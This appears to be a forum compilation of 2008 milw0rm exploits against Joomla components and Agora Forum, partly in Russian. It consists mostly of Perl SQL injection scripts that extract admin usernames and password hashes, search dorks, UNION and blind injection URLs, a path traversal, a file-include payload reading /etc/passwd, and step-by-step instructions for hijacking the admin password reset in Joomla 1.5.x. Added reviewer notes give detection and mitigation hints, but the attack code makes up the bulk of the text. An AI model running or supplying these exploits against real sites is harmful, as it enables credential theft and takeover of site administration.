# Request 1: `ano` parameter, username between "<user>" markers.
$host = $target . "index.php?option=com_altas&mes=hsmx&ano=-1%20union%20select%201,2,concat(CHAR(60,117,115,101,114,62),".$uname.",CHAR(60,117,115,101,114,62)),4,5,6,7,8 from/**/".$magic."/**";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;
print "\n[+] The Target : ".$target."";
if ($answer =~ /<user>(.*?)<user>/){
    print "\n[+] Admin User : $1";
}

# Request 2: `mes` parameter, password column; the first 32-hex-digit string
# anywhere in the page is reported as the hash.
$host2 = $target . "index.php?option=com_altas&mes=-1%20union%20select%201,2,password,4,5,6,7,8/**/from/**/jos_users--";
$res2 = $b->request(HTTP::Request->new(GET=>$host2));
$answer = $res2->content;
if ($answer =~/([0-9a-fA-F]{32})/){
    print "\n[+] Admin Hash : $1\n\n";
    print "# Exploit succeed! #\n\n";
}
else{print "\n[-] Exploit Failed...\n"; }
# coded by Houssamix From H-T Team
# milw0rm.com [2008-07-04]
Component Agora Forum 1.0.4 Acropolis rus vuln code: /moderate.php PHP: $result = $db->query('SELECT id FROM '.$db->prefix.'posts WHERE topic_id='.$_GET['ptid'].' ORDER BY posted LIMIT 1'); vuln code: /my_uploads.php PHP: $db->query('UPDATE '.$db->prefix.'users SET upload=\''.$upload.'\' WHERE id='.$_GET['id']) or error(sprintf($lang_uploadile['err_insert'],$conf_name), __FILE__, __LINE__, $db->error()); Download: Code: http://freedom-ru.net/component/option,com_docman/task,doc_download/gid,41/Itemid,105/ ZAMUT (c)
Joomla Component DT Register Remote SQL injection Joomla Component DT Register Remote SQL injection Code: [*] Author: His0k4 [ALGERIAN HaCkeR] [*] Dork: inurl:com_DTRegister eventId [*] Vendor:http://www.dthdevelopment.com/components/dt-register.html [*] POC : http://[TARGET]/[Path]/index.php?option=com_dtregister&eventId={SQL} [*] Example:http://[TARGET]/[Path]/index.php?option=com_dtregister &eventId=-12 UNION SELECT concat(username,0x3a,password) FROM jos_users&task=pay_options&Itemid=138 [*] Greetings : All friends & muslims HaCkeRs www.dz-secure.com ---------------------------------------------------------------------------- # milw0rm.com [2008-07-16]
Продукт-Joomla Компонент -wap4joomla found by ImpLex & Microsoft Sam exploit Code:
#!/usr/bin/perl -w
# Review note (defender's reading of this proof of concept):
#   Class: unauthenticated UNION-based SQL injection through the `id`
#   parameter of wapmain.php (option=onews&action=link) in the wap4joomla
#   component. A single request selects `username` and `password` from a
#   user-supplied table name, one row at a time via `limit <n>,1`, delimited
#   by the literal markers 111222:::...:::111222 (0x3a3a3a is ":::", 0x3b is
#   ";") so the regex below can cut the row out of the page.
#   Mitigation: integer-cast or bind `id`. Detection: GETs to wapmain.php whose
#   query string contains `union select` and `limit`; the "111222" marker is
#   specific to this tool.
#   Code notes: -w only, no `use strict`; the banner string lost its original
#   line breaks when the page was flattened. The five "[+]" lines printed on
#   success are unconditional commentary — nothing in the script inspects the
#   hash format.
print "\t\t ################################################################ ############ This exploit created by ImpLex ICQ: 444-979 ####### ############ from WHACK.RU ####### ############ WHACK.RU ####### ############ wapmain.php remote sql injection exploit ####### ############ LETS GO!!!! ####### ################################################################\n\n";
use LWP::UserAgent;

# Three interactive inputs: base URL, row offset for LIMIT, users table name.
# None of them is validated before being placed into the request URL.
print "\nEnter your target and folder fith wapversion(http://site.ru/wap): ";
chomp(my $target=<STDIN>);
print "\nEnter number (0-first user probably admin)(1-10000000000 - other users): ";
chomp(my $number=<STDIN>);
print "\nEnter table name with users(default jos_users(recomended) or mos_users or users) ";
chomp(my $table1=<STDIN>);
print "\n[+] connecting to ... ".$target."";
$new = LWP::UserAgent->new() or die "fucking browser does not work\n";
$new->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

# Single request; the selected row is delimited by 111222:::...:::111222.
$host = $target . "/wapmain.php?option=onews&action=link&id=-1+union+select+1,2,3,concat(111222,0x3a3a3a,username,0x3b,password,0x3a3a3a,111222),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+".$table1."+limit+".$number.",1--";
$result = $new->request(HTTP::Request->new(GET=>$host));
$ans = $result->content;
if ($ans =~ /111222:::(.*?):::111222/){
    print "\n[+] User;password : $1";
    print "\n[+] password = md5(md5:salt) or md5";
    print "\n[+] target has been hacked";
    print "\n[+] If password-md5(md5:salt) => Then user - admin";
    print "\n[+] If password-md5 => Then it usual user";
}
else{print "\n[-] Exploit Failed. Search new bugs or exploit:( \n";}
компонент com_imagebrowser просматриваем директории на сервере пример: index.php?option=com_imagebrowser&folder=../../../../
Joomla Component EZ Store Blind SQL Injection Exploit Joomla Component EZ Store Blind SQL Injection Exploit Code:
#!/usr/bin/perl
# Review note (defender's reading of this 2008 proof of concept):
#   Class: boolean-based blind SQL injection through the `id` parameter of
#   the Joomla com_ezstore component. Each request compares one character of
#   the first jos_users password hash (`SUBSTRING(...) = CHAR(h)`) and the
#   answer is inferred from whether "viewcategory&catid=<cid>" appears in the
#   response. 32 positions, '0'..'9' then 'a'..'z'.
#   Detection: a burst of GETs to index.php?option=com_ezstore&Itemid=1 that
#   differ only in the trailing `=CHAR(nn)`; `SUBSTRING((SELECT password` is a
#   reliable signature. Mitigation: integer-cast or bind `id`.
#   Code notes: no `use strict`; `%options` is a file-scoped lexical read by
#   `istrue2` (for the -x proxy). The banner documents a "-t" product-id
#   switch but GetOptions parses "-p" for it. The query string below contains
#   a line break exactly where the page was split; it is reproduced as found.
#   Same skeleton as the Xe webtv script above.
#Note:Sometimes you have to change the regexp to viewcategory/catid,".$cid."
use LWP::UserAgent;
use Getopt::Long;

# Usage banner unless at least host and path were given.
if(!$ARGV[1]) {
    print " \n";
    print " ################################################################\n";
    print " # Joomla Component EZ Store Blind SQL Injection Exploit #\n";
    print " # Author:His0k4 [ALGERIAN HaCkeR] #\n";
    print " # #\n";
    print " # Conctact: His0k4.hlm[at]gamil.com #\n";
    print " # Greetz: All friends & muslims HacKeRs #\n";
    print " # Greetz2: http://www.dz-secure.com #\n";
    print " # #\n";
    print " # Dork: inurl:com_ezstore #\n";
    print " # Usage: perl ezstore.pl host path <options> #\n";
    print " # Example: perl ezstore.pl www.host.com /joomla/ -p 11 -c 2 #\n";
    print " # #\n";
    print " # Options: #\n";
    print " # -t Valid procuct id #\n";
    print " # -c Category value of the following product id #\n";
    print " ################################################################\n";
    exit;
}

my $host = $ARGV[0];
my $path = $ARGV[1];
# Positional fallbacks, read before GetOptions strips switches from @ARGV;
# -c and -p override them below.
my $cid = $ARGV[2];
my $pid = $ARGV[3];
my %options = ();
# -c category id used in the match string, -x HTTP proxy host:port,
# -p product id.
GetOptions(\%options, "c=i", "x=s", "p=i");
print "[~] Exploiting...\n";
if($options{"c"}) { $cid = $options{"c"}; }
if($options{"p"}) { $pid = $options{"p"}; }

# Unbuffered output so each recovered character is shown immediately.
syswrite(STDOUT, "[~] MD5-Hash: ", 14);
for(my $i = 1; $i <= 32; $i++) {
    my $f = 0;
    my $h = 48;
    # Digits '0'..'9' (ASCII 48..57) first.
    while(!$f && $h <= 57) {
        if(istrue2($host, $path, $cid, $pid, $i, $h)) {
            $f = 1;
            syswrite(STDOUT, chr($h), 1);
        }
        $h++;
    }
    # Then lowercase letters 'a'..'z' (ASCII 97..122).
    if(!$f) {
        $h = 97;
        while(!$f && $h <= 122) {
            if(istrue2($host, $path, $cid, $pid, $i, $h)) {
                $f = 1;
                syswrite(STDOUT, chr($h), 1);
            }
            $h++;
        }
    }
}
print "\n[~] Exploiting done\n";

# istrue2(host, path, cid, pid, i, h): one oracle request. Returns 1 when the
# response contains "viewcategory&catid=<cid>" (the page rendered normally,
# i.e. the comparison was true), otherwise 0.
sub istrue2 {
    my $host = shift;
    my $path = shift;
    my $cid = shift;
    my $pid = shift;
    my $i = shift;
    my $h = shift;
    my $ua = LWP::UserAgent->new;
    my $query = "http://".$host.$path."index.php?option=com_ezstore&Itemid=1&func=detail&id=".$pid." 
and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1),".$i.",1))=CHAR(".$h.")";
    # Optional HTTP proxy from -x.
    if($options{"x"}) {
        $ua->proxy('http', "http://".$options{"x"});
    }
    my $resp = $ua->get($query);
    my $content = $resp->content;
    # The match string is interpolated into the regex unescaped; it only
    # contains "&", "=" and digits here.
    my $regexp = "viewcategory&catid=".$cid."";
    if($content =~ /$regexp/) {
        return 1;
    } else {
        return 0;
    }
}
# milw0rm.com [2008-08-03]
Agora 1.0.4 Acropolis Rus google-> inurl: option=com_agora PHP: $task = trim( mosGetParam( $_REQUEST, 'task', "" ) ); if ($task) { require ($agora_path . "/$task.php"); } else { require ($agora_path . "/index.php"); } Null-байт не прокатит из-за trim; можно подключать админские скрипты, в которых нет проверки — единственный плюс в том, что обходим _VALID_MOS в скриптах. Также пригодится, если на жертве есть другие скрипты, или, если кривые настройки на серваке, можно инклюдить скрипты у соседей.
да щас прям - http://php.su/functions/?trim ../../../../../../../../etc/./passwd%00fucked_trim_bypass
Joomla 1.5.x Remote Admin Password Change Joomla 1.5.x Remote Admin Password Change Code: File : /components/com_user/controller.php ##################################################################################### Line : 379-399 function confirmreset() { // Check for request forgeries JRequest::checkToken() or die( 'Invalid Token' ); // Get the input $token = JRequest::getVar('token', null, 'post', 'alnum'); < --- {1} // Get the model $model = &$this->getModel('Reset'); // Verify the token if ($model->confirmReset($token) === false) < --- {2} { $message = JText::sprintf('PASSWORD_RESET_CONFIRMATION_FAILED', $model->getError()); $this->setRedirect('index.php?option=com_user&view=reset&layout=confirm', $message); return false; } $this->setRedirect('index.php?option=com_user&view=reset&layout=complete'); } ##################################################################################### File : /components/com_user/models/reset.php Line: 111-130 function confirmReset($token) { global $mainframe; $db = &JFactory::getDBO(); $db->setQuery('SELECT id FROM #__users WHERE block = 0 AND activation = '.$db->Quote($token)); < ---- {3} // Verify the token if (!($id = $db->loadResult())) { $this->setError(JText::_('INVALID_TOKEN')); return false; } // Push the token and user id into the session $mainframe->setUserState($this->_namespace.'token', $token); $mainframe->setUserState($this->_namespace.'id', $id); return true; } ##################################################################################### {1} - The 'alnum' filter replaces ' with an empty string {3} - If you enter ' in the token field, the query will look like: "SELECT id FROM jos_users WHERE block = 0 AND activation = '' " Example : 1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confirm 2. Write into field "token" char ' and Click OK. 3. Write new password for admin 4. Go to url : target.com/administrator/ 5. Log in as admin with the new password # milw0rm.com [2008-08-12]